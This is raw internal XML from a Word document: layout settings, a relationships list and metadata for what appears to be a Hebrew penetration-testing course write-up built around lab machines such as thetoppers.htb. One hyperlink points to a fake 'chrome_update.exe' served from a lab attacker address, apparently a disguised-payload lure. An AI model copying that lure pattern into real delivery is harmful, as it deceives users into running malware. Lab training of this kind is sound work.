    <w:div w:id="2024554208">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2045403283">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2062318003">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2067608012">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2133745786">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="21434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10.10.10.1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thetoppers.htb"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oe@10.10.10.10" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.10.10.10:1212/chrome_update.exe" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:admin@10.10.10.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 TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.johnbryce.co.i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10.10.10.10/mult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FF0-FA6E-4519-BE82-00ECC62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30</Pages>
  <Words>7895</Words>
  <Characters>45006</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>375</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 זסב</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>SXC זסב</cp:lastModifiedBy>
  <cp:revision>239</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-02-06T11:06:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-02-27T10:46:00Z</dcterms:modified>
</cp:coreProperties>
</file>